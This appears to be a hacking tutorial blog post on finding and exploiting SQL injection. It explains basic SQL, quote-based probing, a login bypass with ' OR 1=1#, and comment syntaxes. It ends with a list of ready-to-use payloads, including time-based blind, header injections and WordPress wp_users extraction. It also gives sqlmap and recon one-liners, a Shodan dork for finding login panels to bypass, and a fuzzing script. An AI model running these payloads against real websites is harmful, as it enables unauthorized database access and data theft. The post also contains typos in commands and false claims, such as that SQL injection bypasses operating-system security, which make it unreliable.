top of page
Writer's pictureNitin Yadav

How to Find SQL Injection Attack Vulnerabilities in 2022?

SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there.




It is one of the most widespread and dangerous vulnerabilities on the Internet.


It is a malicious code that can be used to bypass operating systems' security features.


This functionality allows attackers maximum freedom in creating and manipulating the rest of the website's structure and content, allowing them to gain complete control over it.


The bad thing about SQL Injection is that it's difficult to detect and stop at the time of its exploitation.



The discovery of a SQL Injection vulnerability can be horrifying because it allows an attacker to directly access and potentially compromise the underlying data on your site.


In this article, I'll show you what SQL injection is and how to locate it.



What is SQL injection?


This attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application.


It allows an attacker to view data that they are not normally able to retrieve.


This might include data belonging to other users, or any other data that the application itself is able to access.


In many cases, attackers can modify or delete this data, causing persistent changes to the application's content or behaviour.



Basic SQL Statements


  1. Select Command - It is an introductory statement as it will be used while interacting with other commands. It is the basic statement in SQL. You will use select when you want to select something from the database Example- SELECT * FROM table; here, Select * means you want to select all the data in the table. and, From here means where you want to select the data in this case it is a table. This means you want to select from table(name of the table). Example 2- SELECT age, name FROM Class_details; here, you will get all the data from the columns of age and name and from table class details


  1. Where Command- It is the same as it sounds. It is also a basic statement in SQL. Example- SELECT name, age FROM Class_details WHERE age < 10 Now from this command, you will get the data from the columns' name and age. But only those data will be retrieved whose age is less than 10 years.

  2. Order Command- It is used to sort the results in ascending or descending order. For assending use ASC and for descending use DESC Example- SELECT name, age From Class_details ORDER BY age; if you want it in ascending you can write ASC after age and for descending write DESC after age. here it will start from least age if you use ASC and Max age if you use DESC


  1. Union Command- It is used to join rows together. SELECT age, name FROM Class1_details UNION SELECT age, name FROM Class2_details; Here it will combine the two rows or you can use UNION ALL to return all data.


How to test for SQL Injection


Example 1:

Lets take a query SELECT * FROM Table WHERE id='1';

Here what the query want to say is it want to select al the data from the table from the id 1


So lets now understand what we want to do to test for SQL Injection.


if we use ' it will be false and if we use '' it will be true


if we use " it will be false and if we use "" it will be true


if we use \ it will be false and if we use \\ it will be true


I know you are a bit confuse about true or false but you will get it now.


So as testing for a website we will be seeing only the id maybe or anything else you know about that so what we will use is


Let's say the URL is like


www.website.com?id=1


and for that the query will be SELECT * FROM Table WHERE id='1';


so we will to test for that is


www.website.com?id=1'

or

www.website.com?id=1"

or

www.website.com?id=1\


so these will be like


SELECT * FROM Table WHERE id='1'';

SELECT * FROM Table WHERE id='1'";

SELECT * FROM Table WHERE id='1'\;

And you know you have to complete the query to use another sql statement


SELECT * FROM Table WHERE id='1''';

or you can use is

SELECT * FROM Table WHERE id='1''''''''''''UNION SELECT '2';


it may return the data from id 2





Example 2:

Now lets assume there is a login portal and you don't know the password of that or also its username so what we will do here is:


Let's see its query


SELECT * FROM Users WHERE username = 'correct_username' AND password = 'correct_password';


But what we as a hacker will do is


we will comment out the password part


if you know programming then you must know that where we will use a comment it will not be read while compiling so we will do the same to fool the database.


we will use is


SELECT * FROM Users WHERE username = '' OR 1=1#' AND password = '';


Here everything after # is commented out and will not ready while reading the query.


So we will insect this query in a website like this


assuming we are having a login portal which require username and password


Username :

Password:


What we will use here is


Username : anything' OR 1=1#'

Password : anything


So the above query will run here and we will be able to bypass the login portal


Other Comment queries are


  1. # --------------------------- Hash Comment

  2. /* --------------------------- C-style Comment

  3. -- - --------------------------- SQL Comment

  4. ;%00 --------------------------- Nullbyte

  5. ` --------------------------- Backtick




Some Tips for finding SQL injection


  1. Using SQL map sqlmap -u "http://website.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 Injection marker: * by injecting header

  2. Time based sqli '%2b(select*from(select(sleep(20)))a)%2b'

  3. Using Shodan use the dork org:"TARGET" http.title:"login" and bypass using admin' or 1=1

  4. Another one using SQL map findomain -t http://website.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1

  5. Using Header X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'

  6. Another oneliner subfinder -d website.com -silent -all | gau --blacklist ttt ,woff ,svg ,png | sort -u | gf sqli > sqli.txt; sqlmap -m sqli.txt -batch -risk 3 -ransom-agernt | tee -a sqli_report.txt

  7. Another payload 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

  8. Other payloads > +OR+1=insert(1,1,1,1)-- > +OR+1=replace(1,1,1)-- > {`foo`/*bar*/(select+1)\}' > {`foo`/*bar*/(select%2b2)} >{`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}

  9. Use Logsensor for discovering login panels and post form sqli Link

  10. Script i use: #!/bin/bash for i in $(cat Sql\ injection/BlindSQLi.fuzzdb_seclists.txt) ; do cat $1 | grep “=” | qsreplace “$i” >> sqli ffuf -u FUZZ -w sqli -s -ft “<5000” | tee -a sql_script_results/vulnSqli.txt rm sqli ; done


So that is it for today guys


I hope you all like the blog if so comment down below and if you find any vuln please let me know I will be much happy to hear about that and if you want to see other blogs like this comment down.


For writing your own blog here. You can contact me

We will meet in another blog


Till then


Take care and Happy Hacking




Recent Posts

See All

Comments


bottom of page